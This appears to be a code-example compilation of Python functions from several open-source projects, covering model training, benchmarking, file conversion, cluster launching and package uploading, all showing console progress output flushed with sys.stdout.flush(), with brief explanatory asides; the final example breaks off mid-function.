    def train(self, lr, epochs, save=False, validateAfter=0):
        self._build_train_function()
        sys.stdout.flush()

        if save == True:
            curr_time = datetime.datetime.now()
            weights_f_name = ("./attention-vae-%s-%s-%s-%s-%s-%s.h5" % (curr_time.year, curr_time.month, curr_time.day, curr_time.hour, curr_time.minute, curr_time.second))
            print weights_f_name

        all_outputs = np.array([0.0,0.0,0.0])
        iter_outputs = np.array([0.0,0.0,0.0])
        curr_iter = 0
        print_after = 100
        seen_examples = 0
        total_seen_examples = 0
        prev_outputs = np.array([float("inf"),float("inf"),float("inf")])
        prev_val_results = np.array([float("inf"),float("inf"),float("inf")])

        for epoch in xrange(0, epochs):
            a = datetime.datetime.now()
            
            self.train_iter.reset()
            while True:
                index_cap, index_im, cap_len = self.train_iter.next()
                if type(index_cap) == int:
                    break
                [kl, logpxz, log_likelihood, c_ts, read_attent_params, write_attent_params] = self._train_function(index_im, index_cap, cap_len, lr, self.runSteps)
                kl_total = kl * index_im.shape[0]
                logpxz_total = logpxz * index_im.shape[0]
                log_likelihood_total = log_likelihood * index_im.shape[0]
                all_outputs[0] = all_outputs[0] + kl_total
                all_outputs[1] = all_outputs[1] + logpxz_total
                all_outputs[2] = all_outputs[2] + log_likelihood_total
                iter_outputs[0] = iter_outputs[0] + kl_total
                iter_outputs[1] = iter_outputs[1] + logpxz_total
                iter_outputs[2] = iter_outputs[2] + log_likelihood_total
                seen_examples = seen_examples + index_im.shape[0]
                total_seen_examples = total_seen_examples + index_im.shape[0]

                if curr_iter % print_after == 0 and curr_iter != 0:
                    print 'Iteration %d ; Processed %d entries' % (curr_iter, total_seen_examples)
                    iter_outputs = iter_outputs / seen_examples
                    print float(iter_outputs[0]), float(iter_outputs[1]), float(iter_outputs[2])
                    print '\n'
                    iter_outputs = np.array([0.0,0.0,0.0])
                    seen_examples = 0
                    sys.stdout.flush()

                if curr_iter % (print_after*10) == 0 and curr_iter != 0:
                    self.save_weights(weights_f_name, c_ts, read_attent_params, write_attent_params)
                    print 'Done Saving Weights'
                    print '\n'
                    sys.stdout.flush()
                
                curr_iter = curr_iter + 1
            b = datetime.datetime.now()
            print("Epoch %d took %s" % (epoch, (b-a)))

            if save == True:
                self.save_weights(weights_f_name, c_ts, read_attent_params, write_attent_params)
                print 'Done Saving Weights'

            all_outputs = all_outputs / (self.input_shape[0] * 5) # 5 captions per image
            print 'Train Results'
            print float(all_outputs[0]), float(all_outputs[1]), float(all_outputs[2])

            if validateAfter != 0:
                if epoch % validateAfter == 0:
                    print 'Validation Results'
                    val_results = self.validate()
                    print float(val_results[0]), float(val_results[1]), float(val_results[2])
                    print '\n'

            if float(val_results[-1]) > float(prev_val_results[-1]):
                print("Learning Rate Decreased")
                lr = lr * 0.1
            elif self.reduceLRAfter != 0:
                if epoch == self.reduceLRAfter:
                    print ("Learning Rate Manually Decreased")
                    lr = lr * 0.1
            else:
                prev_val_results = np.copy(val_results)

            print '\n'
            all_outputs = np.array([0.0,0.0,0.0])
            sys.stdout.flush()
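
The training loop above logs aggregate metrics every print_after iterations and flushes after each report, so progress stays visible even when an epoch takes hours and stdout is redirected to a file. A stripped-down sketch of that periodic-logging pattern (the loss value is a made-up placeholder):

import sys

print_after = 100                      # report every 100 iterations, as above

for curr_iter in range(1, 1001):
    loss = 1.0 / curr_iter             # hypothetical stand-in for the real training metrics
    if curr_iter % print_after == 0:
        print('Iteration %d ; loss %.4f' % (curr_iter, loss))
        sys.stdout.flush()             # otherwise buffered output may not appear until the epoch ends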

Example 27

Project: DIRAC Source File: dirac-fix-ld-library-path.py
def fixLDPath( root, ldpath, directory ):
  """
      This is a utility to fix the LD_LIBRARY_PATH on Grid WNs. The
      shared libraries from the original LD_LIBRARY_PATH are linked to
      the locally specified directory.  For Windows (and in general)
      this needs some refurbishment.
  """

  if os.path.exists( directory ):
    shutil.rmtree( directory )

  start = os.getcwd()
  os.mkdir( directory )
  os.chdir( directory )
  uniqueLD = uniquePath( ldpath )

  if DEBUG:
    print 'Unique LD LIBRARY PATH is:'
    print uniqueLD
    sys.stdout.flush()

  ldlist = uniqueLD.split( ':' )
  if DEBUG:
    print ''
    print 'LD List is:'
    print ldlist
    print ''
    sys.stdout.flush()

  for path in ldlist:
    if os.path.exists( path ):

      if DEBUG:
        print 'Searching for shared libraries in:'
        print path
        print '-----------------------------------------------'
        res = shellCall( 0, 'ls ' + path + '/*.so*' )
        if res['OK']:
          print res['Value']
        else:
          print res
        print '-----------------------------------------------'

      output = shellCall( 0, 'ls ' + path + '/*.so*' )
      #must be tidied for Windows (same below)

      if DEBUG:
        if not output['OK']:
          print '**************************'
          print 'Warning, problem with ls:'
          print output
          print '**************************'

      if not output['Value'][0]:
        ldlibs = output['Value'][1].split( '\n' )
        for lib in ldlibs:
          if os.path.exists( lib ):
            filename = os.path.basename( lib )
            output = shellCall( 0, 'ln -s ' + str( lib ) + ' ' + str( filename ) )
            #N.B. for Windows this should be a copy...
            if DEBUG:
              if not output['OK']:
                print '********************************'
                print 'Warning, problem creating link:'
                print 'File: ', filename
                print 'Path: ', lib
                print output
                print '********************************'

      if DEBUG:
        print 'Searching for rootmap file in:'
        print path
        print '-----------------------------------------------'
        res = shellCall( 0, 'ls ' + path + '/*rootmap*' )
        if res['OK']:
          print res['Value']
        else:
          print res
        print '-----------------------------------------------'

      output = shellCall( 0, 'ls ' + path + '/*rootmap*' )

      if DEBUG:
        if not output['OK']:
          print '**************************'
          print 'Warning, problem with rootmap:'
          print output
          print '**************************'

      if not output['Value'][0]:
        ldlibs = output['Value'][1].split( '\n' )
        for lib in ldlibs:
          if os.path.exists( lib ):
            if re.search( 'RELAX', lib ) is not None:
              filename = os.path.basename( lib )
              output = shellCall( 0, 'ln -s ' + str( lib ) + ' ' + str( filename ) )
              if DEBUG:
                if not output['OK']:
                  print '********************************'
                  print 'Warning, problem creating link:'
                  print 'File: ', filename
                  print 'Path: ', lib
                  print output
                  print '********************************'

  os.chdir( start )
  sys.stdout.flush()

Example 28

Project: vbo-convert Source File: vbo_to_ply.py
Function: convert
def convert(filename):

	# todo: get zoom from filename
	zoom=15# current zoom level - sets x & y scale relative to z values
	maximum_range = 4096 # tile-space coordinate maximum

	# convert from tile-space coords to meters, depending on zoom
	def tile_to_meters(zoom):
		return 40075016.68557849 / pow(2, zoom)

	conversion_factor = tile_to_meters(zoom) / maximum_range
	lines = []

	# get lines from input file
	with open(filename, 'r') as f:
		lines = [line.strip() for line in f]
	f.close()

	vertex_count = 0
	newlines = []

	# add vertex definitions
	for i, line in enumerate(lines):
		index = 0

		if len(line) == 0: # skip the occasional empty line
			continue

		newlines.append(line+"\n")
		vertex_count += 1
		# print('vertex_count', vertex_count)
		if (i % 1000 == 0): # print progress
			sys.stdout.flush()
			sys.stdout.write("\r"+(str(round(i / len(lines) * 100, 2))+"%"))

	sys.stdout.flush()
	sys.stdout.write("\r100%")
	sys.stdout.flush()

	# add simple face definitions - every three vertices make a face
	face_count = int(vertex_count / 3)
	for i in range(face_count):
		j = i*3
		newline = "3 "+str(j)+" "+str(j+1)+" "+str(j+2)+"\n"
		newlines.append(newline)

	name, extension = os.path.splitext(filename)
	OUTFILE = name + ".ply"
	open(OUTFILE, 'w').close() # clear existing OUTFILE, if any
	newfile = open(OUTFILE, "w")
	for line in newlines:
		newfile.write("%s" % line)
	newfile.close()

	def line_prepend(filename,line):
	    with open(filename,'r+') as f:
	        content = f.read()
	        f.seek(0,0)
	        f.write(line.rstrip('\r\n') + '\n' + content)

	# generate PLY header
	header = '''ply
	format ascii 1.0
	element vertex '''+str(vertex_count)+'''
	property float x
	property float y
	property float z
	element face '''+str(face_count)+'''
	property list uchar int vertex_indices
	end_header'''

	##
	## a header with vertex colors
	##

	# header = '''ply
	# format ascii 1.0
	# element vertex '''+str(vertex_count)+'''
	# property float x
	# property float y
	# property float z
	# property uchar red
	# property uchar green
	# property uchar blue
	# element face '''+str(face_count)+'''
	# property list uchar int vertex_indices
	# end_header
	# '''


	line_prepend(OUTFILE, header)
	print("Wrote "+OUTFILE)

Example 29

Project: crunch.io-dashboard Source File: models.py
    def launch(self,msg=''):
        """
        In order to launch a ClusterInstance the following requirements must be
        satisfied:
            * A snapshot of the home volume must exist and be shared with the
              launching user (this should have been created at the
              ClusterTemplate creation time)
            * The user has AWS credentials including an ssh keypair.
            * A valid ClusterTemplate has been created.
        """
        from boto.ec2.connection import EC2Connection
        import scwrapper
        import random
        import time
        import datetime
        # FIXME: Add timestamps to logs.

        # Assigning Cluster Parameters
        aws_key_id     = self.cluster_template.user_profile.awscredential.aws_key_id
        aws_secret_key = self.cluster_template.user_profile.awscredential.aws_secret_key
        is_demo        = self.cluster_template.is_demo

        if ( not aws_key_id ) or ( not aws_secret_key ):
            raise 'AwsCredentialError'

        # Randomly selecting a us-east-1{a,b,c,d} availability zone
        # Maybe someday Amazon will give us capacity ideas
        availability_zone = 'us-east-1' + random.choice(('a','b','c','d'))

        # The availability zone needs to be saved for later actions on this
        # ClusterInstance
        self.availability_zone = availability_zone
        self.save()

        # Get latest_snapshot_id
        # TODO: When we support multiple disks, do this for all snapshots
        home_disk = self.cluster_template.disk_set.filter(name='Home')[0]
        latest_snapshot_id = home_disk.latest_snapshot_id
        size = int(home_disk.size)

        if is_demo:
            time.sleep(10)
            home_disk.home_volume_id = 'vol-aaaa1111'
            home_disk.save()
            self.cluster_template.status = 'running'
            self.cluster_template.save()
            print "DEMO: Launching cluster %s in availability zone %s" % \
                    ('demo-cluster', self.availability_zone)
            sys.stdout.flush()
        else:
            # create volume from snapshot in availability_zone
            print "Creating EBS volume from snapshot: %s" % latest_snapshot_id
            sys.stdout.flush()
            conn = EC2Connection(str(aws_key_id), str(aws_secret_key))
            volume = conn.create_volume( size, availability_zone, latest_snapshot_id)
            home_volume_id = volume.id

            # The home_volume_id needs to be saved for later.
            home_disk.home_volume_id = home_volume_id
            home_disk.save()

            star_cluster = scwrapper.Cluster(
                    self.cluster_template,
                    self.availability_zone,
                    )
            print "Launching cluster %s in availability zone %s" % \
                    (star_cluster.cluster_name, self.availability_zone)
            sys.stdout.flush()
            star_cluster.launch()
            sys.stdout.flush()
            self.cluster_template.status = 'running'
            self.cluster_template.save()

            print "Cluster started, saving nodes"
            sys.stdout.flush()
            
            # A new object must be created to get the updated node information.
            running_cluster = scwrapper.Cluster(
                    self.cluster_template,
                    self.availability_zone,
                    )

            # Create the Ec2Instance (Node) objects
            for node in running_cluster.sc.nodes:
                print "Saving node: %s, %s, %s" % ( 
                        node.alias,
                        node.ip_address,
                        node.id
                        )
                sys.stdout.flush()
                instance = Ec2Instance(
                    cluster_instance = self,
                    instance_type    = Ec2InstanceType.objects.filter(api_name = node.instance_type)[0],
                    alias            = node.alias,
                    arch             = node.arch,
                    instance_id      = node.id,
                    image_id         = node.image_id,
                    launch_time = datetime.datetime.strptime(
                        node.launch_time,
                        "%Y-%m-%dT%H:%M:%S.000Z"
                        ),
                    placement          = node.placement,
                    ip_address         = node.ip_address,
                    dns_name           = node.dns_name,
                    private_ip_address = node.private_ip_address,
                    public_dns_name    = node.public_dns_name,
                    state              = node.state
                )
                instance.save()
                print "Saved node: %s" % node.alias
                sys.stdout.flush()

            print "Launching of cluster completed."
            sys.stdout.flush()
 
        return "finished"

Example 30

Project: scikit-learn Source File: bench_plot_omp_lars.py
def compute_bench(samples_range, features_range):

    it = 0

    results = dict()
    lars = np.empty((len(features_range), len(samples_range)))
    lars_gram = lars.copy()
    omp = lars.copy()
    omp_gram = lars.copy()

    max_it = len(samples_range) * len(features_range)
    for i_s, n_samples in enumerate(samples_range):
        for i_f, n_features in enumerate(features_range):
            it += 1
            n_informative = n_features / 10
            print('====================')
            print('Iteration %03d of %03d' % (it, max_it))
            print('====================')
            # dataset_kwargs = {
            #     'n_train_samples': n_samples,
            #     'n_test_samples': 2,
            #     'n_features': n_features,
            #     'n_informative': n_informative,
            #     'effective_rank': min(n_samples, n_features) / 10,
            #     #'effective_rank': None,
            #     'bias': 0.0,
            # }
            dataset_kwargs = {
                'n_samples': 1,
                'n_components': n_features,
                'n_features': n_samples,
                'n_nonzero_coefs': n_informative,
                'random_state': 0
            }
            print("n_samples: %d" % n_samples)
            print("n_features: %d" % n_features)
            y, X, _ = make_sparse_coded_signal(**dataset_kwargs)
            X = np.asfortranarray(X)

            gc.collect()
            print("benchmarking lars_path (with Gram):", end='')
            sys.stdout.flush()
            tstart = time()
            G = np.dot(X.T, X)  # precomputed Gram matrix
            Xy = np.dot(X.T, y)
            lars_path(X, y, Xy=Xy, Gram=G, max_iter=n_informative)
            delta = time() - tstart
            print("%0.3fs" % delta)
            lars_gram[i_f, i_s] = delta

            gc.collect()
            print("benchmarking lars_path (without Gram):", end='')
            sys.stdout.flush()
            tstart = time()
            lars_path(X, y, Gram=None, max_iter=n_informative)
            delta = time() - tstart
            print("%0.3fs" % delta)
            lars[i_f, i_s] = delta

            gc.collect()
            print("benchmarking orthogonal_mp (with Gram):", end='')
            sys.stdout.flush()
            tstart = time()
            orthogonal_mp(X, y, precompute=True,
                          n_nonzero_coefs=n_informative)
            delta = time() - tstart
            print("%0.3fs" % delta)
            omp_gram[i_f, i_s] = delta

            gc.collect()
            print("benchmarking orthogonal_mp (without Gram):", end='')
            sys.stdout.flush()
            tstart = time()
            orthogonal_mp(X, y, precompute=False,
                          n_nonzero_coefs=n_informative)
            delta = time() - tstart
            print("%0.3fs" % delta)
            omp[i_f, i_s] = delta

    results['time(LARS) / time(OMP)\n (w/ Gram)'] = (lars_gram / omp_gram)
    results['time(LARS) / time(OMP)\n (w/o Gram)'] = (lars / omp)
    return results

Example 31

Project: roboto Source File: mecsolve.py
def mecrange(figtype):
    scale = 130
    eps_prologue(50, 110, 570, 630)
    print -50, 0, 'translate'
    print '0.5 setlinewidth'
    thlmin, thlmax = -pi/2, 2.4
    thrmin, thrmax = -2.2, pi / 2 + .2
    print 306 + scale * thlmin, 396, 'moveto', 306 + scale * thlmax, 396, 'lineto stroke'
    print 306, 396 + scale * thrmin, 'moveto', 306, 396 + scale * thrmax, 'lineto stroke'

    print 'gsave [2] 0 setdash'
    print 306, 396 + scale * pi / 2, 'moveto'
    print 306 + scale * thlmax, 396 + scale * pi / 2, 'lineto stroke'
    print 306 + scale * thlmin, 396 - scale * pi / 2, 'moveto'
    print 306 + scale * thlmax, 396 - scale * pi / 2, 'lineto stroke'
    print 306 + scale * pi / 2, 396 + scale * thrmin, 'moveto'
    print 306 + scale * pi / 2, 396 + scale * thrmax, 'lineto stroke'
    print 'grestore'

    print 306 + 3, 396 + scale * thrmax - 10, 'moveto'
    print '/Symbol 12 selectfont (q) show'
    print 0, -2, 'rmoveto'
    print '/Times-Italic 9 selectfont (right) show'

    print 306 - 18, 396 + scale * pi / 2 - 4, 'moveto'
    print '/Symbol 12 selectfont (p/2) show'
    print 306 + scale * 2.2, 396 - scale * pi / 2 + 2, 'moveto'
    print '/Symbol 12 selectfont (-p/2) show'

    print 306 + scale * pi/2 + 2, 396 + scale * thrmax - 10, 'moveto'
    print '/Symbol 12 selectfont (p/2) show'

    print 306 + scale * 2.2, 396 + 6, 'moveto'
    print '/Symbol 12 selectfont (q) show'
    print 0, -2, 'rmoveto'
    print '/Times-Italic 9 selectfont (left) show'

    print '/ss 0.8 def'
    print '/circle { ss 0 moveto currentpoint exch ss sub exch ss 0 360 arc } bind def'
    cmd = 'moveto'
    for i in range(0, 201):
        th = (i * .005 - .75 )* pi
        rmin = 1.5
        rmax = 2.5
        for j in range(20):
            r = (rmin + rmax) * .5
            th0 = r * cos(th)
            th1 = r * sin(th)
            if findmec(th0, th1) == None:
                rmax = r
            else:
                rmin = r
        r = (rmin + rmax) * .5
        th0 = r * cos(th)
        th1 = r * sin(th)
        print '%', r, th, th0, th1
        print 306 + scale * th0, 396 + scale * th1, cmd
        cmd = 'lineto'
        sys.stdout.flush()
    print 'stroke'
    sys.stdout.flush()
        
    for i in range(-11, 12):
        for j in range(-11, i + 1):
            th0, th1 = i * .196, j * .196
            print '%', th0, th1
            params = findmec(th0, th1)
            if params != None:
                sm, sp = params
                print 'gsave'
                print 306 + scale * th0, 396 + scale * th1, 'translate'
                uscale = 22
                k0, lam1, lam2 = justify_mec(sm, sp)
                xys, cost, x, y, th = run_elastica(-.5, .5, k0, lam1, lam2)
                cmdm = 'moveto'
                dx = xys[-1][0] - xys[0][0]
                dy = xys[-1][1] - xys[0][1]
                ch = hypot(dx, dy)
                chth = atan2(dy, dx)
                if figtype == 'mecrange':
                    print 'circle fill'
                    s = uscale * sin(chth) / ch
                    c = uscale * cos(chth) / ch
                    h = -xys[0][0] * s + xys[0][1] * c
                    for xy in xys:
                        print xy[0] * c + xy[1] * s, h + xy[0] * s - xy[1] * c, cmdm
                        cmdm = 'lineto'
                elif figtype == 'mecrangek':
                    ds = 1. / (len(xys) - 1)
                    sscale = 13. / ch
                    kscale = 3 * ch
                    print 'gsave .25 setlinewidth'
                    print sscale * -.5, 0, 'moveto', sscale, 0, 'rlineto stroke'
                    print 'grestore'
                    for l in range(len(xys)):
                        print sscale * (ds * l - 0.5), kscale * xys[l][2], cmdm
                        cmdm = 'lineto'
                print 'stroke'
                print 'grestore'
            sys.stdout.flush()
    print 'showpage'
    eps_trailer()

Example 32

Project: models Source File: swivel.py
  def __init__(self, config):
    """Construct graph for dmc."""
    self._config = config

    # Create paths to input data files
    print 'Reading model from:', config.input_base_path
    sys.stdout.flush()
    count_matrix_files = glob.glob(config.input_base_path + '/shard-*.pb')
    row_sums_path = config.input_base_path + '/row_sums.txt'
    col_sums_path = config.input_base_path + '/col_sums.txt'

    # Read marginals
    row_sums = read_marginals_file(row_sums_path)
    col_sums = read_marginals_file(col_sums_path)

    self.n_rows = len(row_sums)
    self.n_cols = len(col_sums)
    print 'Matrix dim: (%d,%d) SubMatrix dim: (%d,%d) ' % (
        self.n_rows, self.n_cols, config.submatrix_rows, config.submatrix_cols)
    sys.stdout.flush()
    self.n_submatrices = (self.n_rows * self.n_cols /
                          (config.submatrix_rows * config.submatrix_cols))
    print 'n_submatrices: %d' % (self.n_submatrices)
    sys.stdout.flush()

    # ===== CREATE VARIABLES ======

    with tf.device('/cpu:0'):
      # embeddings
      self.row_embedding = embeddings_with_init(
          embedding_dim=config.embedding_size,
          vocab_size=self.n_rows,
          name='row_embedding')
      self.col_embedding = embeddings_with_init(
          embedding_dim=config.embedding_size,
          vocab_size=self.n_cols,
          name='col_embedding')
      tf.histogram_summary('row_emb', self.row_embedding)
      tf.histogram_summary('col_emb', self.col_embedding)

      matrix_log_sum = math.log(np.sum(row_sums) + 1)
      row_bias_init = [math.log(x + 1) for x in row_sums]
      col_bias_init = [math.log(x + 1) for x in col_sums]
      self.row_bias = tf.Variable(row_bias_init,
                                  trainable=config.trainable_bias)
      self.col_bias = tf.Variable(col_bias_init,
                                  trainable=config.trainable_bias)
      tf.histogram_summary('row_bias', self.row_bias)
      tf.histogram_summary('col_bias', self.col_bias)

    # ===== CREATE GRAPH =====

    # Get input
    with tf.device('/cpu:0'):
      global_row, global_col, count = count_matrix_input(
          count_matrix_files, config.submatrix_rows, config.submatrix_cols)

      # Fetch embeddings.
      selected_row_embedding = tf.nn.embedding_lookup(self.row_embedding,
                                                      global_row)
      selected_col_embedding = tf.nn.embedding_lookup(self.col_embedding,
                                                      global_col)

      # Fetch biases.
      selected_row_bias = tf.nn.embedding_lookup([self.row_bias], global_row)
      selected_col_bias = tf.nn.embedding_lookup([self.col_bias], global_col)

    # Multiply the row and column embeddings to generate predictions.
    predictions = tf.matmul(
        selected_row_embedding, selected_col_embedding, transpose_b=True)

    # These binary masks separate zero from non-zero values.
    count_is_nonzero = tf.to_float(tf.cast(count, tf.bool))
    count_is_zero = 1 - tf.to_float(tf.cast(count, tf.bool))

    objectives = count_is_nonzero * tf.log(count + 1e-30)
    objectives -= tf.reshape(selected_row_bias, [config.submatrix_rows, 1])
    objectives -= selected_col_bias
    objectives += matrix_log_sum

    err = predictions - objectives

    # The confidence function scales the L2 loss based on the raw co-occurrence
    # count.
    l2_confidence = (config.confidence_base + config.confidence_scale * tf.pow(
        count, config.confidence_exponent))

    l2_loss = config.loss_multiplier * tf.reduce_sum(
        0.5 * l2_confidence * err * err * count_is_nonzero)

    sigmoid_loss = config.loss_multiplier * tf.reduce_sum(
        tf.nn.softplus(err) * count_is_zero)

    self.loss = l2_loss + sigmoid_loss

    tf.scalar_summary("l2_loss", l2_loss)
    tf.scalar_summary("sigmoid_loss", sigmoid_loss)
    tf.scalar_summary("loss", self.loss)

    # Add optimizer.
    self.global_step = tf.Variable(0, name='global_step')
    opt = tf.train.AdagradOptimizer(config.learning_rate)
    self.train_op = opt.minimize(self.loss, global_step=self.global_step)
    self.saver = tf.train.Saver(sharded=True)
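
The swivel.py constructor above is Python 2 code, where print is a statement with no flush keyword, so each status line is followed by an explicit sys.stdout.flush(). In Python 3 the same effect is available as print(..., flush=True). A minimal sketch of both spellings (the function names and messages here are only illustrative):

import sys

def report_with_explicit_flush(step, total):
    # The pattern used throughout these examples: print, then flush.
    print('processed %d of %d' % (step, total))
    sys.stdout.flush()

def report_with_flush_kwarg(step, total):
    # Python 3 only: print() can flush the stream itself.
    print('processed %d of %d' % (step, total), flush=True)

if __name__ == '__main__':
    for i in range(1, 4):
        report_with_flush_kwarg(i, 3)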

Example 33

Project: AI_Reader Source File: build_imagenet_data.py
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
                               synsets, labels, humans, bboxes, num_shards):
  """Processes and saves list of images as TFRecord in 1 thread.

  Args:
    coder: instance of ImageCoder to provide TensorFlow image coding utils.
    thread_index: integer, unique batch to run index is within [0, len(ranges)).
    ranges: list of pairs of integers specifying ranges of each batches to
      analyze in parallel.
    name: string, unique identifier specifying the data set
    filenames: list of strings; each string is a path to an image file
    synsets: list of strings; each string is a unique WordNet ID
    labels: list of integer; each integer identifies the ground truth
    humans: list of strings; each string is a human-readable label
    bboxes: list of bounding boxes for each image. Note that each entry in this
      list might contain from 0+ entries corresponding to the number of bounding
      box annotations for the image.
    num_shards: integer number of shards for this data set.
  """
  # Each thread produces N shards where N = int(num_shards / num_threads).
  # For instance, if num_shards = 128, and the num_threads = 2, then the first
  # thread would produce shards [0, 64).
  num_threads = len(ranges)
  assert not num_shards % num_threads
  num_shards_per_batch = int(num_shards / num_threads)

  shard_ranges = np.linspace(ranges[thread_index][0],
                             ranges[thread_index][1],
                             num_shards_per_batch + 1).astype(int)
  num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]

  counter = 0
  for s in xrange(num_shards_per_batch):
    # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
    shard = thread_index * num_shards_per_batch + s
    output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
    output_file = os.path.join(FLAGS.output_directory, output_filename)
    writer = tf.python_io.TFRecordWriter(output_file)

    shard_counter = 0
    files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
    for i in files_in_shard:
      filename = filenames[i]
      label = labels[i]
      synset = synsets[i]
      human = humans[i]
      bbox = bboxes[i]

      image_buffer, height, width = _process_image(filename, coder)

      example = _convert_to_example(filename, image_buffer, label,
                                    synset, human, bbox,
                                    height, width)
      writer.write(example.SerializeToString())
      shard_counter += 1
      counter += 1

      if not counter % 1000:
        print('%s [thread %d]: Processed %d of %d images in thread batch.' %
              (datetime.now(), thread_index, counter, num_files_in_thread))
        sys.stdout.flush()

    print('%s [thread %d]: Wrote %d images to %s' %
          (datetime.now(), thread_index, shard_counter, output_file))
    sys.stdout.flush()
    shard_counter = 0
  print('%s [thread %d]: Wrote %d images to %d shards.' %
        (datetime.now(), thread_index, counter, num_files_in_thread))
  sys.stdout.flush()

Example 34

Project: CumulusCI Source File: package_upload.py
    def build_package(self, build_name):
        """ Builds a managed package by calling SauceLabs via Selenium to click the Upload button """ 
        # Update Status
        print 'Starting browser'
        sys.stdout.flush()

        try:
            driver = self.get_selenium()
        except:
            print "Sleeping 5 more seconds to try again.  Last attempt to connect to Selenium failed"
            sleep(5)
            driver = self.get_selenium()

        driver.implicitly_wait(90) # seconds

        # Load the packages list page
        sleep(5) # Not sure why this sleep is necessary, but it seems to be
        driver.get('%s/0A2' % self.instance_url)

        # Update Status
        print 'Loaded package listing page'
        sys.stdout.flush()

        # Click the link to the package
        driver.find_element_by_xpath("//th[contains(@class,'dataCell')]/a[text()='%s']" % self.package).click()

        # Update Status
        print 'Loaded package page'
        sys.stdout.flush()

        # Click the Upload button to open the upload form
        driver.find_element_by_xpath("//input[@class='btn' and @value='Upload']").click()

        # Update Status
        print 'Loaded Upload form'
        sys.stdout.flush()

        # Populate and submit the upload form to create a beta managed package
        name_input = driver.find_element_by_id('ExportPackagePage:UploadPackageForm:PackageDetailsPageBlock:PackageDetailsBlockSection:VersionInfoSectionItem:VersionText')
        name_input.clear()
        name_input.send_keys(build_name)
        driver.find_element_by_id('ExportPackagePage:UploadPackageForm:PackageDetailsPageBlock:PackageDetailsPageBlockButtons:bottom:upload').click()

        # Update Status
        print 'Upload Submitted'
        sys.stdout.flush()

        # Monitor the package upload progress
        retry_count = 0
        last_status = None
        while True:
            try:
                status_message = driver.find_element_by_css_selector('.messageText').text
            except selenium.common.exceptions.StaleElementReferenceException:
                # These come up, possibly if you catch the page in the middle of updating the text via javascript
                sleep(1)
                continue
            except selenium.common.exceptions.NoSuchElementException:
                # These come up, possibly if you catch the page in the middle of updating the text via javascript
                if retry_count > 15:
                    print ".messageText not found after 15 retries"
                    break
                sleep(1)
                retry_count += 1
                continue

            retry_count = 0

            if status_message.startswith('Upload Complete'):
                # Update Status
                print status_message
                sys.stdout.flush()
    
                # Get the version number and install url
                version = driver.find_element_by_xpath("//th[text()='Version Number']/following-sibling::td/span").text
                install_url = driver.find_element_by_xpath("//a[contains(@name, ':pkgInstallUrl')]").get_attribute('href')
            
                self.version = version
                self.install_url = install_url
    
                break

            if status_message.startswith('Upload Failed'):
                print status_message
                sys.stdout.flush()
                break 

            # Update Status
            if status_message != last_status:
                print status_message
                sys.stdout.flush()
            last_status = status_message

            sleep(1)

        driver.quit()    
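
The upload loop above prints a status line and flushes whenever the on-page message changes, so whoever is tailing the build log sees progress immediately rather than after the process exits. A minimal, Selenium-free sketch of that print-on-change-then-flush pattern (wait_for_completion and get_status are illustrative stand-ins, not part of CumulusCI):

import sys
import time

def wait_for_completion(get_status, poll_seconds=1.0):
    """Poll get_status() until it reports success or failure,
    printing (and flushing) only when the message changes."""
    last_status = None
    while True:
        status = get_status()
        if status != last_status:
            print(status)
            sys.stdout.flush()  # make the update visible even when stdout is a pipe
            last_status = status
        if status.startswith('Upload Complete') or status.startswith('Upload Failed'):
            return status
        time.sleep(poll_seconds)

if __name__ == '__main__':
    fake = iter(['In Progress', 'In Progress', 'Upload Complete'])
    print(wait_for_completion(lambda: next(fake), poll_seconds=0.1))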

Example 35

Project: lime-experiments Source File: generate_data_for_compare_classifiers.py
def main():
  parser = argparse.ArgumentParser(description='Evaluate some explanations')
  parser.add_argument('--dataset', '-d', type=str, required=True,help='dataset name')
  parser.add_argument('--output_folder', '-o', type=str, required=True, help='output folder')
  parser.add_argument('--num_features', '-k', type=int, required=True, help='num features')
  parser.add_argument('--num_rounds', '-r', type=int, required=True, help='num rounds')
  parser.add_argument('--start_id',  '-i', type=int, default=0,required=False, help='output start id')
  args = parser.parse_args()
  dataset = args.dataset
  train_data, train_labels, test_data, test_labels, class_names = LoadDataset(dataset)
  rho = 25
  kernel = lambda d: np.sqrt(np.exp(-(d**2) / rho ** 2))
  local = explainers.GeneralizedLocalExplainer(kernel, explainers.data_labels_distances_mapping_text, num_samples=15000, return_mean=True, verbose=False, return_mapped=True)
  # Found through cross validation
  sigmas = {'multi_polarity_electronics': {'neighbors': 0.75, 'svm': 10.0, 'tree': 0.5,
  'logreg': 0.5, 'random_forest': 0.5, 'embforest': 0.75},
  'multi_polarity_kitchen': {'neighbors': 1.0, 'svm': 6.0, 'tree': 0.75,
  'logreg': 0.25, 'random_forest': 6.0, 'embforest': 1.0},
  'multi_polarity_dvd': {'neighbors': 0.5, 'svm': 0.75, 'tree': 8.0, 'logreg':
  0.75, 'random_forest': 0.5, 'embforest': 5.0}, 'multi_polarity_books':
  {'neighbors': 0.5, 'svm': 7.0, 'tree': 2.0, 'logreg': 1.0, 'random_forest':
  1.0, 'embforest': 3.0}}
  parzen1 = parzen_windows.ParzenWindowClassifier()
  parzen1.sigma = sigmas[dataset]['random_forest']
  parzen2 = parzen_windows.ParzenWindowClassifier()
  parzen2.sigma = sigmas[dataset]['random_forest']
  random = explainers.RandomExplainer()

  for Z in range(args.num_rounds):
    exps1 = {}
    exps2 = {}
    explainer_names = ['lime', 'parzen', 'random', 'greedy', 'mutual']
    for expl in explainer_names:
      exps1[expl] = []
      exps2[expl] = []
    print 'Round', Z
    sys.stdout.flush()
    fake_features_z = [([.1, .2], [.1,.1], 10)]#, ([.2, .1], [.1,.1], 10)]
    clean_train, dirty_train, clean_test = corrupt_dataset(fake_features_z, train_data, train_labels, test_data, test_labels)
    vectorizer = CountVectorizer(lowercase=False, binary=True) 
    dirty_train_vectors = vectorizer.fit_transform(dirty_train)
    clean_train_vectors = vectorizer.transform(clean_train)
    test_vectors = vectorizer.transform(clean_test)
    terms = np.array(list(vectorizer.vocabulary_.keys()))
    indices = np.array(list(vectorizer.vocabulary_.values()))
    inverse_vocabulary = terms[np.argsort(indices)]
    tokenizer = vectorizer.build_tokenizer()  
    c1 = ensemble.RandomForestClassifier(n_estimators=30, max_depth=5)
    c2 = ensemble.RandomForestClassifier(n_estimators=30, max_depth=5)
    untrustworthy = [i for i, x in enumerate(inverse_vocabulary) if x.startswith('FAKE')]
